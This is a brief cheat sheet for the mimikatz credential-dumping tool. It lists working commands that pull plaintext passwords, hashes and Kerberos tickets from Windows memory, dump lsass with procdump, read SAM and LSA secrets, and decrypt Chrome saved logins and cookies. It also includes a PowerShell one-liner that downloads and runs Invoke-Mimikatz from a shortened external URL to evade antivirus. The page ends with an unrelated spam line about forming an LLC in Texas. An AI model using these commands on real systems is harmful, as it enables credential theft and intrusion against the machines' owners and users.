mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.
It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
Print mimikatz implementation process log
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
Read the password exported in mimikatz directory
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
Use powershell to bypass AV
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
procdump lsass process export
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
Get the vpn password
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
Get the Browser password
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
Check out Money Brighter to learn how to get an llc in texas in 6 simpler steps.
